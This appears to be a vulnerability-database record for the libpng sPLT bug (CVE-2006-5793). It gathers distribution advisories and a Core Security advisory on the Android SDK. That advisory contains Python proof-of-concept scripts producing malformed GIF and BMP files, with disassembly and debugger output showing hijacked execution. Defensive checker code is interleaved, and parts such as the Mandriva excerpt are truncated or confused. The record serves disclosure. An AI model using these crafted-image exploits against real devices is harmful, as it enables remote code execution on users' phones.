var-200611-0210
Vulnerability from variot
The sPLT chunk handling code (png_set_sPLT function in pngset.c) in libpng 1.0.6 through 1.2.12 uses a sizeof operator on the wrong data type, which allows context-dependent attackers to cause a denial of service (crash) via malformed sPLT chunks that trigger an out-of-bounds read. libpng, the PNG (Portable Network Graphics) image processing library, contains a flaw in the sPLT chunk processing code of the png_set_sPLT() function that causes a memory access violation while a PNG image is processed. Viewing a crafted PNG file placed on a website or attached to an e-mail may result in an interruption of service (DoS). The 'libpng' graphics library is reported prone to a denial-of-service vulnerability. The library fails to perform proper bounds-checking of user-supplied input, which leads to an out-of-bounds read error. Attackers may exploit this vulnerability to crash an application that relies on the affected library.
===========================================================
Ubuntu Security Notice USN-383-1 November 16, 2006
libpng vulnerability
CVE-2006-5793
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10
This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:
Ubuntu 5.10: libpng10-0 1.0.18-1ubuntu3.1
Ubuntu 6.06 LTS: libpng12-0 1.2.8rel-5ubuntu0.1
Ubuntu 6.10: libpng12-0 1.2.8rel-5.1ubuntu0.1
After a standard system upgrade you need to reboot your computer to effect the necessary changes.
Details follow:
Tavis Ormandy discovered that libpng did not correctly calculate the size of sPLT structures when reading an image.
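The bug class named above (a sizeof applied to the wrong data type when sizing a copy of palette entries), as an added C example that is not libpng's code: the types pal_entry and pal_table and all function names are hypothetical, chosen only to show how the byte count overshoots the source array and how the count is derived safely from the destination element.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical types for illustration; these are not libpng's definitions. */
typedef struct {
    uint16_t red, green, blue, alpha, frequency;
} pal_entry;

typedef struct {
    char      *name;
    uint8_t    depth;
    pal_entry *entries;
    int32_t    nentries;
} pal_table;

_Static_assert(sizeof(pal_table) > sizeof(pal_entry),
               "example assumes the container is larger than one entry");

/* Bug pattern: the element count is multiplied by the size of the
 * container struct instead of the size of one array element. */
static size_t copy_len_wrong_type(size_t nentries)
{
    return nentries * sizeof(pal_table);
}

/* Intended size: count times the element type. */
static size_t copy_len_right_type(size_t nentries)
{
    return nentries * sizeof(pal_entry);
}

/* Bytes a memcpy sized with the wrong type would read past the end of a
 * source array that holds exactly nentries elements. */
static size_t overread_bytes(size_t nentries)
{
    return copy_len_wrong_type(nentries) - copy_len_right_type(nentries);
}

/* Hardened copy: the size comes from the destination element itself
 * (sizeof *copy), the count is range-checked, and the multiplication is
 * checked for overflow before allocating. Returns 0 on success, -1 on
 * rejection; dst is left unchanged on failure. */
static int pal_copy_checked(pal_table *dst, const pal_entry *src, int32_t nentries)
{
    if (dst == NULL || src == NULL || nentries <= 0)
        return -1;
    size_t n = (size_t)nentries;
    if (n > SIZE_MAX / sizeof *dst->entries)
        return -1;
    pal_entry *copy = malloc(n * sizeof *copy);
    if (copy == NULL)
        return -1;
    memcpy(copy, src, n * sizeof *copy);
    free(dst->entries);
    dst->entries = copy;
    dst->nentries = nentries;
    return 0;
}

int main(void)
{
    /* Constructed sample data. */
    pal_entry src[3] = { {1, 2, 3, 4, 5}, {6, 7, 8, 9, 10}, {11, 12, 13, 14, 15} };
    pal_table dst = {0};

    printf("right size: %zu bytes, wrong size: %zu bytes, over-read: %zu bytes\n",
           copy_len_right_type(3), copy_len_wrong_type(3), overread_bytes(3));
    if (pal_copy_checked(&dst, src, 3) == 0)
        printf("copied %d entries\n", (int)dst.nentries);
    free(dst.entries);
    return 0;
}
```

Building the caller with AddressSanitizer turns a read sized with the wrong type into an immediate, attributable report instead of a platform-dependent crash.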
Gentoo Linux Security Advisory GLSA 200611-09
http://security.gentoo.org/
Severity: Normal
Title: libpng: Denial of Service
Date: November 17, 2006
Bugs: #154380
ID: 200611-09
Synopsis
A vulnerability in libpng may allow a remote attacker to crash applications that handle untrusted images.
Background
libpng is a free ANSI C library used to process and manipulate PNG images.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-libs/libpng < 1.2.13 >= 1.2.13
Description
Tavis Ormandy of the Gentoo Linux Security Audit Team discovered that a vulnerability exists in the sPLT chunk handling code of libpng: a large sPLT chunk may cause an application to attempt to read out of bounds.
Impact
A remote attacker could craft an image that when processed or viewed by an application using libpng causes the application to terminate abnormally.
Workaround
There is no known workaround at this time.
Resolution
All libpng users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/libpng-1.2.13"
References
[ 1 ] CVE-2006-5793 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200611-09.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.
License
Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
TITLE: FUJITSU Interstage Products Apache Tomcat Security Bypass
SECUNIA ADVISORY ID: SA32234
VERIFY ADVISORY: http://secunia.com/advisories/32234/
CRITICAL: Not critical
IMPACT: Security Bypass
WHERE: From remote
SOFTWARE:
Interstage Application Server 6.x http://secunia.com/advisories/product/13693/
Interstage Application Server 7.x http://secunia.com/advisories/product/13692/
Interstage Application Server 8.x http://secunia.com/advisories/product/13685/
Interstage Application Server 9.x http://secunia.com/advisories/product/15986/
Interstage Apworks 6.x http://secunia.com/advisories/product/13688/
Interstage Apworks 7.x http://secunia.com/advisories/product/13689/
Interstage Studio 8.x http://secunia.com/advisories/product/13690/
Interstage Studio 9.x http://secunia.com/advisories/product/15610/
Interstage Business Application Server 8.x http://secunia.com/advisories/product/13687/
Interstage Job Workload Server 8.x http://secunia.com/advisories/product/13686/
DESCRIPTION: A security issue has been reported in various FUJITSU Interstage products, which potentially can be exploited by malicious people to bypass certain security restrictions.
The security issue is caused due to a synchronisation problem when checking IP addresses and can be exploited to bypass a filter valve that extends "RemoteFilterValve" and potentially gain access to protected contexts.
SOLUTION: Patches are scheduled for release.
Use a proxy or firewall to protect resources.
PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.
ORIGINAL ADVISORY: FUJITSU: http://www.fujitsu.com/global/support/software/security/products-f/interstage-200806e.html
JVN: http://jvn.jp/en/jp/JVN30732239/index.html
Mandriva Linux Security Advisory MDKSA-2006:212 http://www.mandriva.com/security/
Package : doxygen
Date : November 16, 2006
Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0
Problem Description:
Doxygen is a documentation system for C, C++ and IDL. (CVE-2006-3334)
It is questionable whether this issue is actually exploitable, but the patch to correct the issue has been included in versions < 1.2.12. (CVE-2006-5793)
In addition, a patch to address several old vulnerabilities has been applied to this build. (CAN-2002-1363, CAN-2004-0421, CAN-2004-0597, CAN-2004-0598, CAN-2004-0599)
Packages have been patched to correct these issues.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0421
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs
Multiple vulnerabilities in Google's Android SDK
Advisory Information
Title: Multiple vulnerabilities in Google's Android SDK
Advisory ID: CORE-2008-0124
Advisory URL: http://www.coresecurity.com/?action=item&id=2148
Date published: 2008-03-04
Date of last update: 2008-03-04
Vendors contacted: Google
Release mode: Coordinated release
Vulnerability Information
Class: Heap overflow, integer overflow
Remotely Exploitable: No
Locally Exploitable: No
Bugtraq ID: 28006, 28005
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269
Vulnerability Description
Android is a project promoted primarily by Google through the Open Handset Alliance aimed at providing a complete set of software for mobile devices: an operating system, middleware and key mobile applications [1]. Although the project is currently in a development phase and has not made an official release yet, several vendors of mobile chips have unveiled prototype phones built using development releases of the platform at the Mobile World Congress [2]. Development using the Android platform gained activity early in 2008 as a result of Google's launch of the Android Development Challenge which includes $10 million USD in awards [3] for which a Software Development Kit (SDK) was made available in November 2007.
The Android Software Development Kit includes a fully functional operating system, a set of core libraries, application development frameworks, a virtual machine for executing applications and a phone emulator based on the QEMU emulator [4]. Public reports as of February 27th, 2008 state that the Android SDK has been downloaded 750,000 times since November 2007 [5].
Several vulnerabilities have been found in Android's core libraries for processing graphic content in some of the most used image formats (PNG, GIF and BMP). While some of these vulnerabilities stem from the use of outdated and vulnerable open source image processing libraries, others were introduced by native Android code that uses them or that implements new functionality.
Exploitation of these vulnerabilities to yield complete control of a phone running the Android platform has been proved possible using the emulator included in the SDK, which emulates a phone running the Android platform on an ARM microprocessor.
This advisory contains technical descriptions of these security bugs, including a proof of concept exploit to run arbitrary code, proving the possibility of running code on Android stack (over an ARM architecture) via a binary exploit.
Vulnerable Packages
Android SDK m3-rc37a and earlier are vulnerable to several bugs in components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of this advisory). Android SDK m5-rc14 is vulnerable to a security bug in the component that processes BMP images (bug #3).
Non-vulnerable Packages
Android SDK m5-rc15
Vendor Information, Solutions and Workarounds
Vendor statement:
"The current version of the Android SDK is an early look release to the open source community, provided so that developers can begin working with the platform to inform and shape our development of Android toward production readiness. The Open Handset Alliance welcomes input from the security community throughout this process. There will be many changes and updates to the platform before Android is ready for end users, including a full security review."
Credits
These vulnerabilities were discovered by Alfredo Ortega from Core Security Technologies, leading his Bugweek 2007 team called "Pampa Grande". It was researched in depth by Alfredo Ortega.
Technical Description / Proof of Concept Code
Android is a software stack for mobile devices that includes an operating system, middleware and key applications. Android relies on Linux version 2.6 for core system services such as security, memory management, process management, network stack, and driver model. The kernel also acts as an abstraction layer between the hardware and the rest of the software stack.
The WebKit application framework is included to facilitate development of web client application functionality. The framework in turn uses different third-party open source libraries to implement processing of several image formats.
Android includes a web browser based on the Webkit framework that contains multiple binary vulnerabilities when processing .GIF, .PNG and .BMP image files, allowing malicious client-side attacks on the web browser. A client-side attack could be launched from a malicious web site, hosting specially crafted content, with the possibility of executing arbitrary code on the victim's Android system.
These client-side binary vulnerabilities were discovered using the Android SDK that includes an ARM architecture emulator. Binary vulnerabilities are the most common security bugs in computer software. Basic bibliography on these vulnerabilities includes a recently updated handbook about security holes that also describes current state-of-the-art exploitation techniques for different hardware platforms and operating systems [6].
The vulnerabilities discovered are summarized below grouped by the type of image file format that is parsed by the vulnerable component.
#1 - GIF image parsing heap overflow
The Graphics Interchange Format (GIF) is an image format dating at least from 1989 [7]. It was popularized because GIF images can be compressed using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the memory footprint and bandwidth required for transmission and storage.
A memory corruption condition happens within the GIF processing library of the WebKit framework when the function 'GIFImageDecoder::onDecode()' allocates a heap buffer based on the Logical Screen Width and Height fields of the GIF header (offsets 6 and 8) and then the resulting buffer is filled in with an amount of data bytes that is calculated based on the real Width and Height of the GIF image. There is a similar (if not the same) bug in the function 'GIFImageDecoder::haveDecodedRow()' in the open-source version included by Android in 'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp' inside 'webkit-522-android-m3-rc20.tar.gz' available at [8].
Detailed analysis:
When the process 'com.google.android.browser' must handle content with a GIF file it loads a dynamic library called 'libsgl.so' which contains the decoders for multiple image file formats.
Decoding of the GIF image is performed correctly by the library giflib 4.0 (compiled inside 'libsgl.so'). However, the wrapper object 'GIFImageDecoder' miscalculates the total size of the image.
First, the Logical Screen Size is read and stored in the following calling sequence (As giflib is an Open Source MIT-licenced library, the source was available for analysis): 'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last function, 'DGifGetScreenDesc()', stores the Logical Screen Width and Height in a structure called 'GifFileType':
/-----------
int DGifGetScreenDesc(GifFileType * GifFile) {
    ...
    /* Put the screen descriptor into the file: */
    if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR ||
        DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR)
        return GIF_ERROR;
    ...
}
- -----------/
We can see that the fields are stored in the first 2 words of the structure:
/-----------
typedef struct GifFileType {
    /* Screen dimensions. */
    GifWord SWidth, SHeight,
    ...
}
- -----------/
In the disassembly of the GIFImageDecoder::onDecode() function provided below we can see how the DGifOpen() function is called and that the return value (A GifFileType struct) is stored on the $R5 ARM register:
/-----------
.text:0002F234    BL      DGifOpen
.text:0002F238    SUBS    R5, R0, #0        ; GifFile - $R5
- -----------/
Then, the giflib function 'DGifSlurp()' is called and the Image size is correctly allocated using the Image Width and Height and not the Logical Screen Size:
/-----------
int DGifSlurp(GifFileType * GifFile) {
    ...
    ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height;
    sp->RasterBits = (unsigned char *)malloc(ImageSize * sizeof(GifPixelType));
    ...
}
- -----------/
Afterwards the Logical Screen Width and Height are stored in the R9 and R11 registers:
/-----------
.text:0002F28C    LDMIA   R5, {R9,R11}      ; R9=SWidth R11=SHeight !
- -----------/
However, the actual image may be much larger than these sizes, which are incorrectly passed to a number of methods of the 'GIFImageDecoder':
/-----------
ImageDecoder::chooseFromOneChoice():
.text:0002F294    MOV     R0, R8
.text:0002F298    MOV     R1, #3
.text:0002F29C    MOV     R2, R9
.text:0002F2A0    MOV     R3, R11
.text:0002F2A4    STR     R12, [SP,#0x48+var_3C]
.text:0002F2A8    BL      _ImageDecoder19chooseFromOneChoice; ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int ,int)

Bitmap::setConfig():
.text:0002F2B8    MOV     R0, R7            ; R7 = SkBitmap
.text:0002F2BC    MOV     R1, #3
.text:0002F2C0    MOV     R2, R9            ; R9=SWidth R11=SHeight !
.text:0002F2C4    MOV     R3, R11
.text:0002F2C8    STR     R10, [SP,#0x48+var_48]
.text:0002F2CC    BL      _Bitmap9setConfig ; Bitmap::setConfig(SkBitmap::Config,uint,uint,uint)
- -----------/
This function stores the SWidth and SHeight inside the Bitmap object as shown in the following code snippet:
/-----------
.text:00035C38    MOV     R7, R2            ; $R2 = SWidth, goes to $R7
.text:00035C3C    MOV     R8, R3            ; $R3 = SHeight, goes to $R8
.text:00035C40    MOV     R4, R0            ; $R4 = *Bitmap
- -----------/
And later:
/-----------
.text:00035C58    BL      _Bitmap15ComputeRowBytes ; SkBitmap::ComputeRowBytes(SkBitmap::Config,uint)
.text:00035C5C    MOV     R5, R0            ; $R5 = Real Row Bytes
.text:00035C68    STRH    R7, [R4,#0x18]    ; Bitmap+0x18 = SWidth
.text:00035C6C    STRH    R8, [R4,#0x1A]    ; Bitmap+0x1A = SHeight
.text:00035C60    STRH    R5, [R4,#0x1C]    ; *Bitmap+0x1C = Row Bytes
- -----------/
The following python script generates a GIF file that causes the overflow. It requires the Python Imaging Library. Once the GIF file has been generated, it must be opened in the Android browser to trigger the overflow:
/-----------
Android Heap Overflow
Ortega Alfredo _ Core Security Exploit Writers Team
tested against Android SDK m3-rc37a
import Image import struct
Creates a good gif image
imagename='overflow.gif' str = '\x00\x00\x00\x00'*30000 im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1) im.save(imagename,'GIF')
Shrink the Logical screen dimension
SWidth=1 SHeight=1
img = open(imagename,'rb').read() img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:]
Save the bad gif image
q=open(imagename,'wb=""') q.write(img) q.close() - -----------/
This security bug affects Android SDK m3-rc37a and earlier versions. Version m5-rc14 of the Android SDK includes a fix and is not vulnerable to this bug.
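A decoder-side check for the mismatch described in bug #1, as an added C example that is not code from the advisory, giflib or Android: it reads the Logical Screen Width and Height at offsets 6 and 8, walks to the first Image Descriptor, and reports whether the image rectangle fits inside the logical screen before any buffer is sized from either pair. The function name, enum and sample byte arrays are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum gif_check { GIF_MALFORMED = -1, GIF_EXCEEDS_SCREEN = 0, GIF_FITS = 1 };

static unsigned rd16(const uint8_t *p)
{
    return (unsigned)p[0] | ((unsigned)p[1] << 8);   /* little-endian */
}

/* Compare the first Image Descriptor against the Logical Screen size. */
static enum gif_check gif_first_image_fits(const uint8_t *buf, size_t len)
{
    if (len < 13 ||
        (memcmp(buf, "GIF87a", 6) != 0 && memcmp(buf, "GIF89a", 6) != 0))
        return GIF_MALFORMED;

    unsigned swidth = rd16(buf + 6), sheight = rd16(buf + 8);
    size_t pos = 13;                                  /* header + screen descriptor */
    if (buf[10] & 0x80)                               /* global color table present */
        pos += (size_t)3 << ((buf[10] & 0x07) + 1);   /* 3 * 2^(N+1) bytes */

    while (pos < len) {
        uint8_t tag = buf[pos++];
        if (tag == 0x2C) {                            /* Image Descriptor */
            if (len - pos < 9)
                return GIF_MALFORMED;
            unsigned left = rd16(buf + pos),     top = rd16(buf + pos + 2);
            unsigned w    = rd16(buf + pos + 4), h   = rd16(buf + pos + 6);
            if (w == 0 || h == 0)
                return GIF_MALFORMED;
            return (left + w <= swidth && top + h <= sheight)
                       ? GIF_FITS : GIF_EXCEEDS_SCREEN;
        }
        if (tag != 0x21 || pos >= len)                /* only extensions may precede */
            return GIF_MALFORMED;
        pos++;                                        /* extension label */
        for (;;) {                                    /* skip data sub-blocks */
            if (pos >= len)
                return GIF_MALFORMED;
            uint8_t n = buf[pos++];
            if (n == 0)
                break;
            if (len - pos < n)
                return GIF_MALFORMED;
            pos += n;
        }
    }
    return GIF_MALFORMED;
}

/* Constructed samples: headers only, no pixel data. */
static const uint8_t sample_mismatch[] = {
    'G','I','F','8','9','a', 1,0, 1,0, 0x00, 0, 0,     /* screen 1x1, no color table */
    0x21, 0xF9, 0x04, 0,0,0,0, 0x00,                   /* graphic control extension */
    0x2C, 0,0, 0,0, 4,0, 1,0, 0x00                     /* image 4x1 at (0,0) */
};
static const uint8_t sample_ok[] = {
    'G','I','F','8','9','a', 4,0, 1,0, 0x80, 0, 0,     /* screen 4x1, 2-entry table */
    0,0,0, 255,255,255,
    0x2C, 0,0, 0,0, 4,0, 1,0, 0x00                     /* image 4x1 at (0,0) */
};

int main(void)
{
    printf("mismatch sample: %d\n", gif_first_image_fits(sample_mismatch, sizeof sample_mismatch));
    printf("consistent sample: %d\n", gif_first_image_fits(sample_ok, sizeof sample_ok));
    return 0;
}
```

A decoder that gets GIF_EXCEEDS_SCREEN should reject the file or size its buffer from the larger rectangle; it should not allocate from one pair of dimensions and write using the other.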
#2 - PNG image parsing, multiple vulnerabilities:
The Portable Network Graphics (PNG) is a bitmapped image format that employs lossless data compression [9]. PNG was created to improve upon and replace the GIF format as an image file format that does not require a patent license.
The library 'libsgl.so' used by Android's WebKit contains commonly used code to load graphic files, such as libpng, giflib and others. The version inside libsgl.so distributed with Android SDK m3-rc37a and earlier versions includes the string '"libpng version 1.2.8 - December 3, 2004"'. Source code inspection of the file '\WebKitLib\WebKit\WebCore\platform\image-decoders\png\png.c' included in the 'webkit-522-android-m3-rc20.tar.gz' release of the Android project reveals that '"libpng version 1.2.7 - September 12, 2004"' has been used in this release.
This old version of libpng makes Android SDK m3-rc37a and earlier versions vulnerable to the following known issues: 'CVE-2006-5793, CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269'.
Android version m5-rc14 has been updated to include libpng 1.2.24 and is likely not vulnerable.
#3 - BMP image processing, negative offset integer overflow:
The BMP file format, sometimes called bitmap or DIB file format (for device-independent bitmap), is an image file format used to store bitmap digital images, especially on Microsoft Windows and OS/2 operating systems [10].
The integer overflow is caused when a Windows Bitmap file (.BMP) header is parsed in the method 'BMP::readFromStream(Stream *, ImageDecoder::Mode)' inside the 'libsgl.so' library. When the value of the 'offset' field of the BMP file header is negative and the Bitmap Information section (DIB header) specifies an image of 8 bits per pixel (8 bpp) the parser will try to allocate a palette, and will use the negative offset to calculate the size of the palette.
The following code initializes the palette with the color white ('0x00ffffff') but with a carefully chosen negative offset it can be made to overwrite any address of the process with that value. Because the BMP decoder source wasn't released, a disassembly of the binary included by Android is provided below:
/-----------
.text:0002EE38    MOV     LR, R7            ; R7 is the negative offset
.text:0002EE3C    MOV     R12, R7,LSL#2
.text:0002EE40
.text:0002EE40 loc_2EE40
.text:0002EE40    LDR     R3, [R10,#0x10]
.text:0002EE44    ADD     LR, LR, #1
.text:0002EE48    MOVL    R2, 0xFFFFFFFF
.text:0002EE4C    ADD     R1, R12, R3       ; R3 is uninitialized (because of the same bug) but ranges 0x10000-0x20000
.text:0002EE50    MOV     R0, #0
.text:0002EE54    CMP     LR, R9
.text:0002EE58    STRB    R2, [R12,R3]      ; Write 0x00ffffff to R12+R3 (equals R1)
.text:0002EE5C    STRB    R2, [R1,#2]
.text:0002EE60    STRB    R0, [R1,#3]
.text:0002EE64    STRB    R2, [R1,#1]
.text:0002EE68    ADD     R12, R12, #4
.text:0002EE6C    BNE     loc_2EE40
- -----------/
Now, let's take a look at the memory map of the Android browser:
/-----------
ps
ps
USER     PID   PPID  VSIZE RSS   WCHAN    PC         NAME
root     1     0     248   64    c0084edc 0000ae2c S /init
root     2     0     0     0     c0049168 00000000 S kthreadd
...
root     1206  1165  16892 14564 c0084edc 00274af8 S ./gdb
app_0    1574  535   83564 12832 ffffffff afe0c79c S com.google.android.browser
root     1600  587   840   324   00000000 afe0bfbc R ps
cat /proc/1574/maps
cat /proc/1574/maps
00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process
0000a000-00c73000 rwxp 0000a000 00:00 0 [heap]
08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted)
...
- -----------/
We can see that the heap is located in the range '0000a000-00c73000' and that it is executable. Overwriting this area allows execution flow to be redirected if a virtual table is stored in the heap. Later in the same method we can see that a call is made through the "Stream" object's virtual table:
/-----------
.text:0002EB64    LDR     R12, [R8]         # R8 is the "this" pointer of the Stream Object
.text:0002EB68    MOV     R0, R8
.text:0002EB6C    MOV     LR, PC
.text:0002EB70    LDR     PC, [R12,#0x10]   # A call is made to Stream+0x10
- -----------/
Because the "Stream" Object (R8) is stored on the heap and we can fill the heap with the white color ' 0x00ffffff' we can load the Program Counter with the value at '0xffffff+0x10'. The following python script will generate a BMP to accomplish that:
/-----------
# This script generates a Bitmap file that makes the Android browser
# jump to the address at 0xffffff+0x10
# Must be loaded inside a HTML file with a tag like this: <IMG src=badbmp.bmp>
# Alfredo Ortega - Core Security
import struct

offset = 0xffef0000
width = 0x0bffff
height=8

bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00"
bmp+=struct.pack("<I",offset)
bmp+="\x28\x00\x00\x00"
bmp+=struct.pack("<I",width)
bmp+=struct.pack("<I",height)
bmp+="\x03\x00\x08\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff"
bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41"
bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
open("badbmp.bmp","wb").write(bmp)
- -----------/
Opening the BMP file generated with this script inside a HTML page will cause (sometimes, as it is dependent on an uninitialized variable) the following output of the gdb debugger:
/-----------
(gdb) attach 1574
attach 1574
Attaching to program: /system/bin/app_process, process 1574
...
0xafe0d204 in __futex_wait () from /system/lib/libc.so
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
(gdb)
- -----------/
Here the browser process has jumped to the '0x00000000' address because that is the value at 0x00ffffff+0x10. We can change this value using common JavaScript heap-filling techniques.
The complete exploit page follows:
/-----------
- -----------/
Because the exploit needs to fill over 16 MB of heap memory to reach the address '0xffffff', it is very slow, and the default memory configuration of Android will often abort the process before it reaches the desired point. To overcome this limitation for demonstration purposes, one can launch the emulator with these parameters:
'emulator -qemu -m 192'
That will launch the Android emulator with 192 megabytes of memory, plenty for the exploit to work.
This security bug affects Android SDK m5-rc14 and earlier versions.
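A defensive counterpart to the BMP analysis above, added here and not part of the Core advisory or of Android's code: a header check that rejects files whose pixel-data offset, dimensions or plane count are inconsistent before they reach a decoder, including the 0xffef0000 offset that the disassembly comments treat as negative. The names check_bmp, build_bmp and MAX_DIMENSION are hypothetical, the dimension cap is an assumed policy value, and only the 40-byte BITMAPINFOHEADER layout is accepted.

```python
import struct

FILE_HDR = struct.Struct("<2sIHHI")       # magic, bfSize, reserved x2, bfOffBits (14 bytes)
INFO_HDR = struct.Struct("<IiiHHIIiiII")  # BITMAPINFOHEADER (40 bytes)
MAX_DIMENSION = 16384                     # assumption: local policy cap, not a BMP limit
VALID_BPP = (1, 4, 8, 16, 24, 32)
BI_RGB, BI_BITFIELDS = 0, 3


def check_bmp(data):
    """Return a list of (code, detail) findings; an empty list means the header is consistent."""
    if len(data) < FILE_HDR.size + INFO_HDR.size:
        return [("truncated", "shorter than the 54-byte file and info headers")]
    magic, bf_size, _r1, _r2, off_bits = FILE_HDR.unpack_from(data, 0)
    (bi_size, width, height, planes, bpp, compression, _img, _xppm, _yppm,
     clr_used, _clr_imp) = INFO_HDR.unpack_from(data, FILE_HDR.size)
    if magic != b"BM":
        return [("magic", "file does not start with 'BM'")]
    if bi_size != INFO_HDR.size:
        # Other header variants exist; this checker deliberately refuses them.
        return [("header-size", "biSize %d is not the 40-byte BITMAPINFOHEADER" % bi_size)]

    findings = []
    if bf_size != len(data):
        findings.append(("file-size", "bfSize %d but %d bytes supplied" % (bf_size, len(data))))

    rows = abs(height)  # a negative height means a top-down bitmap
    dims_ok = 0 < width <= MAX_DIMENSION and 0 < rows <= MAX_DIMENSION
    if not dims_ok:
        findings.append(("dimensions", "width %d / height %d outside 1..%d"
                         % (width, height, MAX_DIMENSION)))
    if planes != 1:
        findings.append(("planes", "biPlanes is %d, must be 1" % planes))
    bpp_ok = bpp in VALID_BPP
    if not bpp_ok:
        findings.append(("bit-count", "biBitCount %d is not a valid depth" % bpp))

    # Palette entries (4 bytes each) sit between the info header and the pixels.
    colours = 0
    if bpp_ok and bpp <= 8:
        colours = clr_used or (1 << bpp)
        if colours > (1 << bpp):
            findings.append(("palette", "biClrUsed %d exceeds 2^%d" % (clr_used, bpp)))
            colours = 1 << bpp
    min_off = FILE_HDR.size + bi_size + 4 * colours
    if compression == BI_BITFIELDS:
        min_off += 12  # three 32-bit channel masks follow the header

    if off_bits & 0x80000000:
        findings.append(("offset-sign",
                         "bfOffBits 0x%08x is negative when read as a signed 32-bit int" % off_bits))
    if not min_off <= off_bits <= len(data):
        findings.append(("offset-range", "bfOffBits 0x%x outside [%d, %d]"
                         % (off_bits, min_off, len(data))))
    elif dims_ok and bpp_ok and compression in (BI_RGB, BI_BITFIELDS):
        stride = ((width * bpp + 31) // 32) * 4  # rows are padded to 4 bytes
        if off_bits + stride * rows > len(data):
            findings.append(("pixel-data", "needs %d pixel bytes, file has %d"
                             % (stride * rows, len(data) - off_bits)))
    return findings


def build_bmp(width, height, bpp, pixels, off_bits=None, planes=1, bf_size=None):
    """Construct a test BMP (sample input for this example only)."""
    palette = b"\x00" * (4 * (1 << bpp) if bpp <= 8 else 0)
    total = FILE_HDR.size + INFO_HDR.size + len(palette) + len(pixels)
    if off_bits is None:
        off_bits = FILE_HDR.size + INFO_HDR.size + len(palette)
    head = FILE_HDR.pack(b"BM", total if bf_size is None else bf_size, 0, 0, off_bits)
    info = INFO_HDR.pack(INFO_HDR.size, width, height, planes, bpp, BI_RGB, 0, 0, 0, 0, 0)
    return head + info + palette + pixels


# Constructed samples: a consistent 2x2 24-bit image, and a header carrying the
# offset, width, height, plane count and bfSize values seen in the script above.
GOOD = build_bmp(2, 2, 24, b"\x00" * 16)
BAD = build_bmp(0x0bffff, 8, 8, b"\x41" * 64, off_bits=0xffef0000, planes=3, bf_size=0xff)

if __name__ == "__main__":
    for name, sample in (("GOOD", GOOD), ("BAD", BAD)):
        print(name, check_bmp(sample) or "ok")
```
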
Report Timeline
2008-01-30: Vendor is notified that possibly exploitable vulnerabilities were discovered and that an advisory draft is available. This affects Android SDK m3-rc37a and earlier versions.
2008-01-30: Vendor acknowledges and requests the draft.
2008-01-31: Core sends the draft encrypted, including PoC code to generate malformed GIF images.
2008-01-31: Vendor acknowledges the draft.
2008-02-02: Vendor notifies that the software is an early release for the open source community, but agrees they can fix the problem on the estimated date (2008-02-25).
